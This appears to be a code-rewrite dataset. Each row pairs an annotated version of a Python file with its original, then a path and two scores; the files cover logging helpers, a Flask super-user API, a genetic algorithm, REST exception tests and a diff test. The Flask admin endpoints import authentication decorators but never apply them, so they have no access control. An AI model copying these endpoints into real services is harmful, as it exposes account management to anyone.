    console.setFormatter(logging.Formatter(fmt))
    logger.addHandler(console)
    logger.setLevel(logging.DEBUG)
    if filename:
        file_handler = logging.FileHandler(filename)
        file_handler.setLevel(logging.INFO)
        file_fmt = "%(asctime)s " + (fmt if fmt else '%(message)s')
        file_handler.setFormatter(logging.Formatter(file_fmt))
        logger.addHandler(file_handler)
class RedirectHandler(logging.Handler):
    """Handler that forwards every record to the logger named *name*."""
    def __init__(self, name, level=logging.DEBUG):
        # Contemplate feasibility of copying a destination (allow original handler) and redirecting.
        logging.Handler.__init__(self, level)
        self.name = name
        # Resolve the target logger once, up front.
        self.logger = logging.getLogger(name)
    def emit(self, record):
        # Re-dispatch through the target logger's own handler chain.
        self.logger.handle(record)
def signalcommand(func):
    """A decorator for management command handle defs that sends out a pre/post signal."""
    import functools

    # functools.wraps preserves the command's __name__/__doc__ so
    # introspection and help output keep working (previously lost).
    @functools.wraps(func)
    def inner(self, *args, **kwargs):
        pre_command.send(self.__class__, args=args, kwargs=kwargs)
        ret = func(self, *args, **kwargs)
        post_command.send(self.__class__, args=args, kwargs=kwargs, outcome=ret)
        return ret
    return inner
def has_ipdb():
    """Return True when both ipdb and IPython are importable."""
    try:
        import ipdb  # noqa
        import IPython  # noqa
    except ImportError:
        return False
    return True
class UnicodeWriter:
    """
    A CSV writer which will write rows to CSV file "f",
    which is encoded in the given encoding.
    """
    def __init__(self, f, dialect=csv.excel, encoding="utf-8", **kwds):
        # csv.writer produces text on Python 3, so buffer rows in a
        # StringIO (the original BytesIO queue raised TypeError) and
        # encode the result before writing it to the target stream.
        from io import StringIO
        self.queue = StringIO()
        self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
        self.stream = f
        self.encoder = codecs.getincrementalencoder(encoding)()

    def writerow(self, row):
        """Write one CSV record built from *row* (a sequence of strings)."""
        self.writer.writerow(row)
        # Fetch the formatted text from the queue ...
        data = self.queue.getvalue()
        # ... encode it into the target encoding and write to the stream.
        self.stream.write(self.encoder.encode(data))
        # Reset the queue (truncate alone would leave the position past
        # the discarded data).
        self.queue.seek(0)
        self.queue.truncate(0)

    def writerows(self, rows):
        """Write every row in *rows*."""
        for row in rows:
            self.writerow(row)
from flask_restplus import Resource, Namespace
from app.v1.extensions.auth.jwt_auth import auth
from app.v1.extensions.auth import role_required
from flask import request
from app import db
from app.v1.utils.super_user_utils import save_super_user,update_super_user,delete_super_user,new_registors,data_ActivateNewRegisters,data_RejectNewRegisters
from .serial import super_user_reg_model_list,update_super_user_update,update_model,super_user_delete,new_registors_data
# Namespace grouping all super-user management endpoints.
super_user_ns = Namespace('super_user')
# Request parser exposing the (optional) bearer-token header in the API docs.
parser = super_user_ns.parser()
parser.add_argument('Authorization',
                    type=str,
                    required=False,
                    location='headers',
                    help='Bearer Access Token')
@super_user_ns.route('/super_user_create')
class super_create(Resource):
    """POST endpoint that creates a new super user."""

    @super_user_ns.expect(super_user_reg_model_list, validate=True)
    def post(self):
        """Create a super user from the validated JSON payload."""
        data = request.json
        # Removed debug print of the raw payload: the registration model may
        # carry credentials, which must not end up in server logs.
        return save_super_user(data=data)
@super_user_ns.route('/super_user_delete')
# NOTE(review): this class name shadows the `super_user_delete` model imported
# from .serial. The expect() argument below still resolves to the model (it is
# evaluated while the class body executes, before the class name is bound),
# but after this statement the module-level name refers to the class.
# Consider renaming one of the two to avoid confusion.
class super_user_delete(Resource):
    """DELETE endpoint that removes a super user."""
    @super_user_ns.expect(super_user_delete, validate=True)
    def delete(self):
        data = request.json
        return delete_super_user(data=data)
@super_user_ns.route('/super_user_update')
class super_user_update(Resource):
    """PUT endpoint that updates an existing super user."""

    @super_user_ns.expect(update_super_user_update, validate=True)
    def put(self):
        payload = request.json
        return update_super_user(data=payload)
@super_user_ns.route('/NewRegistrationData')
class NewRegistrationData(Resource):
    """GET endpoint returning new-registration records, marshalled with the
    `new_registors_data` model under a 'data' envelope."""
    @super_user_ns.marshal_list_with(new_registors_data,envelope='data')
    def get(self):
        return new_registors()
@super_user_ns.route('/ActivateNewRegisters/<id>')
class ActivateNewRegisters(Resource):
    # NOTE(review): activation via GET mutates state; a POST/PUT would be the
    # conventional REST choice.
    def get(self,id):
        # Delegates activation of the registration identified by <id>.
        return data_ActivateNewRegisters(id)
@super_user_ns.route('/RejectNewRegisters/<id>')
class RejectNewRegisters(Resource):
def get(self,id):
return data_RejectNewRegisters(id) | app/v1/modules/super_user/resources.py | from flask_restplus import Resource, Namespace
from app.v1.extensions.auth.jwt_auth import auth
from app.v1.extensions.auth import role_required
from flask import request
from app import db
from app.v1.utils.super_user_utils import save_super_user,update_super_user,delete_super_user,new_registors,data_ActivateNewRegisters,data_RejectNewRegisters
from .serial import super_user_reg_model_list,update_super_user_update,update_model,super_user_delete,new_registors_data
super_user_ns = Namespace('super_user')
parser = super_user_ns.parser()
parser.add_argument('Authorization',
type=str,
required=False,
location='headers',
help='Bearer Access Token')
@super_user_ns.route('/super_user_create')
class super_create(Resource):
@super_user_ns.expect(super_user_reg_model_list, validate=True)
def post(self):
data = request.json
print(data)
return save_super_user(data=data)
@super_user_ns.route('/super_user_delete')
class super_user_delete(Resource):
@super_user_ns.expect(super_user_delete, validate=True)
def delete(self):
data = request.json
return delete_super_user(data=data)
@super_user_ns.route('/super_user_update')
class super_user_update(Resource):
@super_user_ns.expect(update_super_user_update, validate=True)
def put(self):
data = request.json
return update_super_user(data=data)
@super_user_ns.route('/NewRegistrationData')
class NewRegistrationData(Resource):
@super_user_ns.marshal_list_with(new_registors_data,envelope='data')
def get(self):
return new_registors()
@super_user_ns.route('/ActivateNewRegisters/<id>')
class ActivateNewRegisters(Resource):
def get(self,id):
return data_ActivateNewRegisters(id)
@super_user_ns.route('/RejectNewRegisters/<id>')
class RejectNewRegisters(Resource):
def get(self,id):
return data_RejectNewRegisters(id) | 0.318485 | 0.096068 |
from collections import defaultdict
import random
from typing import List, Tuple, Set, DefaultDict
from math import ceil
from instance import Instance
MAX_ITERATIONS = 2000
BEST_POSSIBLE_FITNESS = 1
Solution = DefaultDict[int, Set[Tuple[int, int]]]
EvaluatedSolution = Tuple[Solution, int, float]
Population = List[Solution]
EvaluatedPopulation = List[EvaluatedSolution]
class GeneticAlgorithm:
'''Genetic Algorithm to solve the MLST problem.
After instantiating, just call the run() method.
Args:
instance: MLST instance to be solved.
seed: RNG seed.
population_size: Number of simultaneous solutions.
mutation_rate: Probability of a solution mutate.
elitism_rate: Percentage of best solutions to be preserved across iterations.
'''
def __init__(self, instance: Instance, seed: int, population_size: int, mutation_rate: float, elitism_rate: float):
    self._instance = instance
    self._population_size = population_size
    self._mutation_rate = mutation_rate
    self._elitism_rate = elitism_rate
    # Seed the module-level RNG so runs with the same seed are reproducible.
    # NOTE(review): this mutates global `random` state shared by the process.
    random.seed(seed)
def run(self) -> Tuple[EvaluatedSolution, EvaluatedSolution]:
    '''Runs the algorithm until reaching a stop criteria.
    Returns:
        Tuple with first solution and last solution (in this order).
    '''
    # Number of top solutions copied unchanged into each next generation.
    elite_size = ceil(self._elitism_rate*self._population_size)
    new_solutions_size = self._population_size - elite_size
    population = self._generate_initial_population()
    should_stop = False
    i = 1
    first_solution = None
    best_solution = None
    while not should_stop:
        print(f'iteration {i}')  # progress trace; consider the logging module
        evaluated_pop = self._evaluate_population(population)
        elite = self._elitism_operator(evaluated_pop, elite_size)
        if i == 1:
            # Remember the best initial solution for later comparison.
            first_solution = evaluated_pop[0]
        # evaluated_pop is sorted ascending by fitness (label count), so
        # index 0 is this generation's best; track the best seen overall.
        if not best_solution or best_solution[1] > evaluated_pop[0][1]:
            best_solution = evaluated_pop[0]
        new_solutions = self._crossover_operator(evaluated_pop, new_solutions_size)
        population = elite + self._mutation_operator(new_solutions)
        should_stop = self._stopping_criterion(best_solution, i)
        i += 1
    return (first_solution, best_solution)
def _generate_initial_population(self) -> Population:
    '''Builds the initial candidate solutions.

    Each candidate is a spanning tree obtained by a DFS over the whole
    graph, started from a randomly chosen root.

    Returns:
        List with the initial candidate solutions.
    '''
    return [
        self._dfs_tree(root)
        for root in random.choices(self._instance.nodes, k=self._population_size)
    ]
def _dfs_tree(self, root: int, solution: Solution = None) -> Solution:
    '''Builds a spanning tree via randomized DFS.

    Args:
        root: Node the tree is grown from.
        solution: Graph to traverse. When falsy (e.g. the `None` default),
            the full instance adjacency list is traversed instead.
    Returns:
        Spanning tree rooted at `root`.
    '''
    graph = solution or self._instance.adjacency_list
    return self._dfs_tree_internal(root, {root}, defaultdict(set), graph)
def _dfs_tree_internal(self, root: int, expanded_nodes: Set[int], new_solution: Solution, solution: Solution) -> Solution:
    '''Generates a spanning tree through DFS.
    This method must not be used directly. Use the wrapper `self._dfs_tree` instead.
    Args:
        root: Initial spanning tree node.
        expanded_nodes: Nodes already visited.
        new_solution: Solution being calculated.
        solution: Graph being traversed.
    Returns:
        Spanning tree.
    '''
    # Shuffling makes the produced tree random; the shuffle also consumes
    # RNG state, so seeded reproducibility depends on this call order.
    neighbors = list(solution[root])
    random.shuffle(neighbors)
    for neighbor, label in neighbors:
        if neighbor not in expanded_nodes:
            expanded_nodes.add(neighbor)
            # Record the edge in both directions (undirected adjacency).
            new_solution[root].add((neighbor, label))
            new_solution[neighbor].add((root, label))
            self._dfs_tree_internal(neighbor, expanded_nodes, new_solution, solution)
    # NOTE(review): recursion depth equals the tree depth; very deep
    # instances may exceed Python's recursion limit.
    return new_solution
def _evaluate_population(self, population: Population) -> EvaluatedPopulation:
    '''Computes the absolute and relative fitness of every solution.

    The absolute fitness is the number of distinct edge labels the
    solution uses (fewer is better for MLST).

    Args:
        population: Solutions whose fitness will be calculated.
    Returns:
        Tuples of (solution, absolute fitness, relative fitness), sorted
        by absolute fitness in ascending order.
    '''
    scored = []
    for candidate in population:
        labels = {label for edges in candidate.values() for _, label in edges}
        scored.append((candidate, len(labels)))
    total = sum(score for _, score in scored)
    evaluated = [(candidate, score, score / total) for candidate, score in scored]
    return sorted(evaluated, key=lambda entry: entry[1])
def _elitism_operator(self, population: EvaluatedPopulation, elite_size: int) -> Population:
    '''Selects the best solutions of an evaluated population.

    Args:
        population: Population already evaluated and sorted ascending.
        elite_size: Number of best solutions to keep.
    Returns:
        The `elite_size` best solutions, stripped of their fitness scores.
    '''
    return [entry[0] for entry in population[:elite_size]]
def _crossover_operator(self, population: EvaluatedPopulation, new_solutions_size: int) -> Population:
    '''Produces a new population by applying crossover to the current one.

    Parent selection uses the roulette method (fitness-proportional).
    Two parents are combined by merging their edge sets and extracting a
    spanning tree with a DFS from a random root.

    Args:
        population: Current population, already evaluated.
        new_solutions_size: Number of offspring to produce.
    Returns:
        New population of `new_solutions_size` solutions.
    '''
    new_solutions = []
    probs = [relative_fitness for _, _, relative_fitness in population]
    for _ in range(new_solutions_size):
        father_1, father_2 = [solution for solution, _, _ in random.choices(population, weights=probs, k=2)]
        # BUGFIX: the default factory must be the builtin `set`, not the
        # `typing.Set` alias -- instantiating typing aliases is deprecated
        # (and scheduled for removal), so a missing-key read would break.
        child = defaultdict(set)
        for node in self._instance.nodes:
            child[node] = father_1[node].union(father_2[node])
        root = random.choice(self._instance.nodes)
        new_solutions.append(self._dfs_tree(root, child))
    return new_solutions
def _mutation_operator(self, population: Population) -> Population:
    '''Applies random mutations to a population.

    Each solution mutates with probability `self._mutation_rate`: a random
    node becomes the root, its neighbourhood is reset to the full set of
    neighbours from the problem instance, and a fresh DFS spanning tree is
    extracted from the modified graph.

    Args:
        population: Population to be mutated.
    Returns:
        New population.
    '''
    new_solutions = []
    for solution in population:
        should_mutate = random.choices([True, False], weights=[self._mutation_rate, 1 - self._mutation_rate])[0]
        # 'in' operator is EXTREMELY FASTER with sets. 55s with lists, 16s with sets.
        if should_mutate:
            root = random.choice(self._instance.nodes)
            # BUGFIX: copy the instance's adjacency set instead of aliasing
            # it -- any later in-place `.add()` on solution[root] would
            # otherwise corrupt the shared problem-instance graph.
            solution[root] = set(self._instance.adjacency_list[root])
            for neighbor, label in solution[root]:
                solution[neighbor].add((root, label))
            new_solutions.append(self._dfs_tree(root, solution))
        else:
            new_solutions.append(solution)
    return new_solutions
def _stopping_criterion(self, best_solution: EvaluatedSolution, iteration: int) -> bool:
'''Decides if must stop the algorithm.
Args:
best_solution: Best solution found in the last iteration, already evaluated.
iteration: Number of executed iterations.
Returns:
True if the algorithm must stop. False otherwise.
'''
return best_solution[1] == BEST_POSSIBLE_FITNESS or \
iteration == MAX_ITERATIONS | genetic-algorithm/genetic_algorithm.py | from collections import defaultdict
import random
from typing import List, Tuple, Set, DefaultDict
from math import ceil
from instance import Instance
MAX_ITERATIONS = 2000
BEST_POSSIBLE_FITNESS = 1
Solution = DefaultDict[int, Set[Tuple[int, int]]]
EvaluatedSolution = Tuple[Solution, int, float]
Population = List[Solution]
EvaluatedPopulation = List[EvaluatedSolution]
class GeneticAlgorithm:
'''Genetic Algorithm to solve the MLST problem.
After instantiating, just call the run() method.
Args:
instance: MLST instance to be solved.
seed: RNG seed.
population_size: Number of simultaneous solutions.
mutation_rate: Probability of a solution mutate.
elitism_rate: Percentage of best solutions to be preserved across iterations.
'''
def __init__(self, instance: Instance, seed: int, population_size: int, mutation_rate: float, elitism_rate: float):
self._instance = instance
self._population_size = population_size
self._mutation_rate = mutation_rate
self._elitism_rate = elitism_rate
random.seed(seed)
def run(self) -> Tuple[EvaluatedSolution, EvaluatedSolution]:
'''Runs the algorithm until reaching a stop criteria.
Returns:
Tuple with first solution and last solution (in this order).
'''
elite_size = ceil(self._elitism_rate*self._population_size)
new_solutions_size = self._population_size - elite_size
population = self._generate_initial_population()
should_stop = False
i = 1
first_solution = None
best_solution = None
while not should_stop:
print(f'iteration {i}')
evaluated_pop = self._evaluate_population(population)
elite = self._elitism_operator(evaluated_pop, elite_size)
if i == 1:
first_solution = evaluated_pop[0]
if not best_solution or best_solution[1] > evaluated_pop[0][1]:
best_solution = evaluated_pop[0]
new_solutions = self._crossover_operator(evaluated_pop, new_solutions_size)
population = elite + self._mutation_operator(new_solutions)
should_stop = self._stopping_criterion(best_solution, i)
i += 1
return (first_solution, best_solution)
def _generate_initial_population(self) -> Population:
''' Generates the initial solutions.
Each spanning tree is created by recording the selected edges during a DFS on the whole graph.
Each DFS runs with a random root.
Returns:
List with initial candidate solutions.
'''
population = []
roots = random.choices(self._instance.nodes, k=self._population_size)
for root in roots:
population.append(self._dfs_tree(root))
return population
def _dfs_tree(self, root: int, solution: Solution = None) -> Solution:
'''Generates a spanning tree through DFS.
Args:
root: Initial spanning tree node.
solution: Graph to be traversed. Defaults to None.
If its value is falsy (like the `None` default), then `self._instance.adjacency_list` is used.
Returns:
Spanning tree.
'''
if not solution:
solution = self._instance.adjacency_list
return self._dfs_tree_internal(root, {root, }, defaultdict(set), solution)
def _dfs_tree_internal(self, root: int, expanded_nodes: Set[int], new_solution: Solution, solution: Solution) -> Solution:
'''Generates a spanning tree through DFS.
This method must not be used directly. Use the wrapper `self._dfs_tree` instead.
Args:
root: Initial spanning tree node.
expanded_nodes: Nodes already visited.
new_solution: Solution being calculated.
solution: Graph being traversed.
Returns:
Spanning tree.
'''
neighbors = list(solution[root])
random.shuffle(neighbors)
for neighbor, label in neighbors:
if neighbor not in expanded_nodes:
expanded_nodes.add(neighbor)
new_solution[root].add((neighbor, label))
new_solution[neighbor].add((root, label))
self._dfs_tree_internal(neighbor, expanded_nodes, new_solution, solution)
return new_solution
def _evaluate_population(self, population: Population) -> EvaluatedPopulation:
'''Computes the absolute and relative fitness for each solution.
Args:
population: Solutions whose fitness will be calculated.
Returns:
A list of tuples with a solution as the first component, the absolute fitness as second
and the relative fitness as third. The result is sorted by absolute fitness,
in ascending order.
'''
result = []
for solution in population:
labels = set()
for edges_list in solution.values():
for _, label in edges_list:
labels.add(label)
fitness = len(labels)
result.append((solution, fitness))
fitness_sum = sum([fitness for _, fitness in result])
result = [(solution, fitness, fitness/fitness_sum) for solution, fitness in result]
sorted_result = sorted(result, key=lambda x: x[1])
return sorted_result
def _elitism_operator(self, population: EvaluatedPopulation, elite_size: int) -> Population:
'''Generates a list with the best solutions.
Args:
population (List[Tuple[List[Edge], int, float]]): Popolation already evaluated and sorted.
elite_size (int): Number of best solutions to be selected.
Returns:
List of `elite_size` best solutions.
'''
return [solution for solution, _, _ in population[0:elite_size]]
def _crossover_operator(self, population: EvaluatedPopulation, new_solutions_size: int) -> Population:
'''Produces a new population applying crossover in the current population.
This method implements the `roulette method`.
Two solutions are combined by merging its edges and applying DFS from a random root.
Args:
population: Current population already evaluated.
new_solutions_size: Size of new population.
Returns:
New population.
'''
new_solutions = []
probs = [relative_fitness for _, _, relative_fitness in population]
for i in range(new_solutions_size):
father_1, father_2 = [solution for solution, _, _ in random.choices(population, weights=probs, k=2)]
child = defaultdict(Set)
for node in self._instance.nodes:
child[node] = father_1[node].union(father_2[node])
root = random.choice(self._instance.nodes)
new_solutions.append(self._dfs_tree(root, child))
return new_solutions
def _mutation_operator(self, population: Population) -> Population:
'''Applies random mutations in population.
Each solution will be mutated with probability `self._mutation_rate`.
The mutation is doing by selecting a random node as root and setting its neigbors as all neighbors from the problem instance.
Lastly, we apply DFS in this solution, starting from selected root.
Args:
population: Population to be mutated.
Returns:
New population.
'''
new_solutions =[]
for solution in population:
should_mutate = random.choices([True, False], weights=[self._mutation_rate, 1-self._mutation_rate])[0]
# 'in' operator is EXTREMELY FASTER with sets. 55s with lists, 16s with sets.
if should_mutate:
root = random.choice(self._instance.nodes)
solution[root] = self._instance.adjacency_list[root]
for neighbor, label in solution[root]:
solution[neighbor].add((root, label))
new_solutions.append(self._dfs_tree(root, solution))
else:
new_solutions.append(solution)
return new_solutions
def _stopping_criterion(self, best_solution: EvaluatedSolution, iteration: int) -> bool:
'''Decides if must stop the algorithm.
Args:
best_solution: Best solution found in the last iteration, already evaluated.
iteration: Number of executed iterations.
Returns:
True if the algorithm must stop. False otherwise.
'''
return best_solution[1] == BEST_POSSIBLE_FITNESS or \
iteration == MAX_ITERATIONS | 0.937633 | 0.513242 |
from WMCore.WebTools.RESTModel import RESTModel, restexpose
from cherrypy import HTTPError
import unittest, logging, json
from WMQuality.WebTools.RESTServerSetup import cherrypySetup, DefaultConfig
from WMQuality.WebTools.RESTClientAPI import makeRequest, methodTest
class REST_Exceptions_t(RESTModel):
    # REST model whose GET handlers deliberately raise, used to exercise the
    # REST API's error-propagation behaviour.
    def __init__(self, config):
        '''
        Initialise the RESTModel and add some methods to it.
        '''
        RESTModel.__init__(self, config)
        # generic_exception is registered directly in the methods dict
        # (rather than via _addMethod) and exposed with @restexpose.
        self.methods['GET'] = {}
        self.methods['GET']['generic_exception'] = {'args': [],
                                                    'call': self.generic_exception,
                                                    'version': 1}
        self._addMethod('GET', 'specific_400_exception', self.specific_400_exception)
        self._addMethod('GET', 'specific_500_exception', self.specific_500_exception)
        self._addMethod('GET', 'specific_404_exception', self.specific_404_exception)
        self._addMethod('GET', 'not_serialisable', self.not_serialisable)
    @restexpose
    def generic_exception(self):
        """
        Raise an exception - this will result in a 500 Server Error from the RESTAPI
        """
        assert 1 == 2, "1 does not equal 2"
    def specific_400_exception(self):
        """
        Raise an HTTP Error, this will be preserved and propagated to the client
        """
        raise HTTPError(400, 'I threw a 400')
    def specific_500_exception(self):
        """
        Raise an HTTP Error, this will be preserved and propagated to the client
        """
        raise HTTPError(500, 'I threw a 500')
    def specific_404_exception(self):
        """
        Raise an HTTP Error, this will be preserved and propagated to the client
        """
        raise HTTPError(404, 'I threw a 404')
    def not_serialisable(self):
        """
        Raise an exception in the formatter (complex numbers aren't json serialisable
        by default), this is caught and turned into a 500 Server Error by the RESTAPI
        """
        return complex(1,2)
test_config = DefaultConfig('WMCore_t.WebTools_t.REST_Exceptions_t')
test_config.Webtools.access_log_level = logging.WARNING
test_config.Webtools.error_log_level = logging.WARNING
from WMQuality.WebTools.RESTBaseUnitTest import RESTBaseUnitTest
# Disabling tests because the decorator doesn't work right
class RESTTestFAIL():
    """Exception-propagation tests for the REST API.

    Intentionally NOT a TestCase subclass: the cherrypySetup decorator does
    not work correctly, so these tests are disabled (see module comment).
    """
    def setUp(self):
        self.config = test_config
        self.dasFlag = False
        self.urlbase = self.config.getServerUrl()
    def tearDown(self):
        self.dasFlag = None
        self.urlbase = None
    def _get_json(self, endpoint, code):
        """GET `endpoint`, assert HTTP status `code`, return the decoded JSON body.

        Extracted because every test repeated the same request boilerplate,
        and each assertion re-ran json.loads(response) (up to four decodes
        per test); the payload is now parsed exactly once.
        """
        url = self.urlbase + endpoint
        response, expires = methodTest('GET', url, output={'code': code})
        return json.loads(response)
    @cherrypySetup(test_config)
    def testGenericException(self):
        """
        Method will raise an AssertionError and return 500
        """
        payload = self._get_json('generic_exception', 500)
        assert payload['message'] == "Server Error", 'got: %s' % payload['message']
        assert payload['type'] == "AssertionError", 'got: %s' % payload['type']
    @cherrypySetup(test_config)
    def testSpecific400Exception(self):
        """
        Method will raise an HTTPError and return 400
        """
        payload = self._get_json('specific_400_exception', 400)
        assert payload['message'] == "I threw a 400", 'got: %s' % payload['message']
    @cherrypySetup(test_config)
    def testSpecific404Exception(self):
        """
        Method will raise an HTTPError and return 404
        """
        payload = self._get_json('specific_404_exception', 404)
        assert payload['message'] == "I threw a 404", 'got: %s' % payload['message']
    @cherrypySetup(test_config)
    def testSpecific500Exception(self):
        """
        Method will raise an HTTPError and return 500
        """
        payload = self._get_json('specific_500_exception', 500)
        assert payload['message'] == "I threw a 500", 'got: %s' % payload['message']
    @cherrypySetup(test_config)
    def testNotSerialisableException(self):
        """
        Method will raise an EncodeError and return 500
        """
        payload = self._get_json('not_serialisable', 500)
        assert payload['message'] == "Server Error", 'got: %s' % payload['message']
        assert payload['type'] == "TypeError", 'got: %s' % payload['type']
if __name__ == "__main__":
unittest.main() | test/python/WMCore_t/WebTools_t/REST_Exceptions_t.py | from WMCore.WebTools.RESTModel import RESTModel, restexpose
from cherrypy import HTTPError
import unittest, logging, json
from WMQuality.WebTools.RESTServerSetup import cherrypySetup, DefaultConfig
from WMQuality.WebTools.RESTClientAPI import makeRequest, methodTest
class REST_Exceptions_t(RESTModel):
def __init__(self, config):
'''
Initialise the RESTModel and add some methods to it.
'''
RESTModel.__init__(self, config)
self.methods['GET'] = {}
self.methods['GET']['generic_exception'] = {'args': [],
'call': self.generic_exception,
'version': 1}
self._addMethod('GET', 'specific_400_exception', self.specific_400_exception)
self._addMethod('GET', 'specific_500_exception', self.specific_500_exception)
self._addMethod('GET', 'specific_404_exception', self.specific_404_exception)
self._addMethod('GET', 'not_serialisable', self.not_serialisable)
@restexpose
def generic_exception(self):
"""
Raise an exception - this will result in a 500 Server Error from the RESTAPI
"""
assert 1 == 2, "1 does not equal 2"
def specific_400_exception(self):
"""
Raise an HTTP Error, this will be preserved and propagated to the client
"""
raise HTTPError(400, 'I threw a 400')
def specific_500_exception(self):
"""
Raise an HTTP Error, this will be preserved and propagated to the client
"""
raise HTTPError(500, 'I threw a 500')
def specific_404_exception(self):
"""
Raise an HTTP Error, this will be preserved and propagated to the client
"""
raise HTTPError(404, 'I threw a 404')
def not_serialisable(self):
"""
Raise an exception in the formatter (complex numbers aren't json serialisable
by default), this is caught and turned into a 500 Server Error by the RESTAPI
"""
return complex(1,2)
test_config = DefaultConfig('WMCore_t.WebTools_t.REST_Exceptions_t')
test_config.Webtools.access_log_level = logging.WARNING
test_config.Webtools.error_log_level = logging.WARNING
from WMQuality.WebTools.RESTBaseUnitTest import RESTBaseUnitTest
# Disabling tests because the decorator doesn't work right
class RESTTestFAIL():
def setUp(self):
self.config = test_config
self.dasFlag = False
self.urlbase = self.config.getServerUrl()
def tearDown(self):
self.dasFlag = None
self.urlbase = None
@cherrypySetup(test_config)
def testGenericException(self):
"""
Method will raise an AssertionError and return 500
"""
url = self.urlbase + 'generic_exception'
response, expires = methodTest('GET', url, output={'code':500})
assert json.loads(response)['message'] == "Server Error", 'got: %s' % json.loads(response)['message']
assert json.loads(response)['type'] == "AssertionError", 'got: %s' % json.loads(response)['type']
@cherrypySetup(test_config)
def testSpecific400Exception(self):
"""
Method will raise an HTTPError and return 400
"""
url = self.urlbase + 'specific_400_exception'
response, expires = methodTest('GET', url, output={'code':400})
assert json.loads(response)['message'] == "I threw a 400", 'got: %s' % json.loads(response)['message']
@cherrypySetup(test_config)
def testSpecific404Exception(self):
"""
Method will raise an HTTPError and return 404
"""
url = self.urlbase + 'specific_404_exception'
response, expires = methodTest('GET', url, output={'code':404})
assert json.loads(response)['message'] == "I threw a 404", 'got: %s' % json.loads(response)['message']
@cherrypySetup(test_config)
def testSpecific500Exception(self):
"""
Method will raise an HTTPError and return 500
"""
url = self.urlbase + 'specific_500_exception'
response, expires = methodTest('GET', url, output={'code':500})
assert json.loads(response)['message'] == "I threw a 500", 'got: %s' % json.loads(response)['message']
@cherrypySetup(test_config)
def testNotSerialisableException(self):
"""
Method will raise an EncodeError and return 500
"""
url = self.urlbase + 'not_serialisable'
response, expires = methodTest('GET', url, output={'code':500})
assert json.loads(response)['message'] == "Server Error", 'got: %s' % json.loads(response)['message']
assert json.loads(response)['type'] == "TypeError", 'got: %s' % json.loads(response)['type']
if __name__ == "__main__":
unittest.main() | 0.600774 | 0.23375 |
from nose.tools import eq_
from ..apply import apply
from ..tokenizers import text_split
def diff_and_replay(diff):
    # Round-trip check for a diff implementation: for each (a, b) scenario,
    # tokenize both texts, diff them, print the operations, then re-apply
    # the operations to a's tokens and assert the result reproduces b.
    # NOTE(review): the three scenarios below repeat the same boilerplate
    # verbatim -- a helper taking (a, b, title) would remove the duplication.
    a = """
This sentence is going to get copied. This sentence is going to go away.
This is a paragraph that is mostly going to change. However, there's going
to be a sentence right in the middle that stays. And now we're done with
that.
This is another sentence. asldknasl dsal dals dals dlasd oa kdlawbndkubawdk
"""
    b = """
This sentence is going to get copied. Wha... a new thing appeared!
Everyone thought that this paragraph would totally change. However, there's
going to be a sentence right in the middle that stays. Isn't that funny!?
This is another sentence. This sentence is going to get copied.
"""
    a_tokens = list(text_split.tokenize(a))
    b_tokens = list(text_split.tokenize(b))
    operations = list(diff(a_tokens, b_tokens))
    print("Diff 1:")
    for op in operations:
        if op.name == "equal":
            print("equal: " + repr("".join(a_tokens[op.a1:op.a2])))
        elif op.name == "delete":
            print("delete: " + repr("".join(a_tokens[op.a1:op.a2])))
        elif op.name == "insert":
            print("insert: " + repr("".join(b_tokens[op.b1:op.b2])))
    replay_b = [str(t) for t in apply(operations, a_tokens, b_tokens)]
    eq_(b, ''.join(replay_b))
    # Scenario 2: sentence removal plus partial rewrite.
    a = "I'm new here. This sentence is a sentence. I'm new here."
    b = "I'm new here. Sentence is a sentence."
    a_tokens = list(text_split.tokenize(a))
    b_tokens = list(text_split.tokenize(b))
    operations = list(diff(a_tokens, b_tokens))
    print("\nDiff 2:")
    for op in operations:
        if op.name == "equal":
            print("equal: " + repr("".join(a_tokens[op.a1:op.a2])))
        elif op.name == "delete":
            print("delete: " + repr("".join(a_tokens[op.a1:op.a2])))
        elif op.name == "insert":
            print("insert: " + repr("".join(b_tokens[op.b1:op.b2])))
    replay_b = [str(t) for t in apply(operations, a_tokens, b_tokens)]
    eq_(b, ''.join(replay_b))
    # Scenario 3: a sentence moved between paragraphs.
    a = """This is a test paragraph. It has some sentences.
I have a lovely bunch of coconuts.
This is another test paragraph. It also has some sentences.
This is a test sentence just floating in space."""
    b = """This is a test paragraph. It has some sentences.
This is another test paragraph. It also has some sentences.
I have a lovely bunch of coconuts.
This is a test sentence just floating in space."""
    a_tokens = list(text_split.tokenize(a))
    b_tokens = list(text_split.tokenize(b))
    operations = list(diff(a_tokens, b_tokens))
    print("\nDiff 3:")
    for op in operations:
        if op.name == "equal":
            print("equal: " + repr("".join(a_tokens[op.a1:op.a2])))
        elif op.name == "delete":
            print("delete: " + repr("".join(a_tokens[op.a1:op.a2])))
        elif op.name == "insert":
            print("insert: " + repr("".join(b_tokens[op.b1:op.b2])))
    replay_b = [str(t) for t in apply(operations, a_tokens, b_tokens)]
eq_(b, ''.join(replay_b)) | deltas/tests/diff_and_replay.py | from nose.tools import eq_
from ..apply import apply
from ..tokenizers import text_split
def diff_and_replay(diff):
a = """
This sentence is going to get copied. This sentence is going to go away.
This is a paragraph that is mostly going to change. However, there's going
to be a sentence right in the middle that stays. And now we're done with
that.
This is another sentence. asldknasl dsal dals dals dlasd oa kdlawbndkubawdk
"""
b = """
This sentence is going to get copied. Wha... a new thing appeared!
Everyone thought that this paragraph would totally change. However, there's
going to be a sentence right in the middle that stays. Isn't that funny!?
This is another sentence. This sentence is going to get copied.
"""
a_tokens = list(text_split.tokenize(a))
b_tokens = list(text_split.tokenize(b))
operations = list(diff(a_tokens, b_tokens))
print("Diff 1:")
for op in operations:
if op.name == "equal":
print("equal: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "delete":
print("delete: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "insert":
print("insert: " + repr("".join(b_tokens[op.b1:op.b2])))
replay_b = [str(t) for t in apply(operations, a_tokens, b_tokens)]
eq_(b, ''.join(replay_b))
a = "I'm new here. This sentence is a sentence. I'm new here."
b = "I'm new here. Sentence is a sentence."
a_tokens = list(text_split.tokenize(a))
b_tokens = list(text_split.tokenize(b))
operations = list(diff(a_tokens, b_tokens))
print("\nDiff 2:")
for op in operations:
if op.name == "equal":
print("equal: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "delete":
print("delete: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "insert":
print("insert: " + repr("".join(b_tokens[op.b1:op.b2])))
replay_b = [str(t) for t in apply(operations, a_tokens, b_tokens)]
eq_(b, ''.join(replay_b))
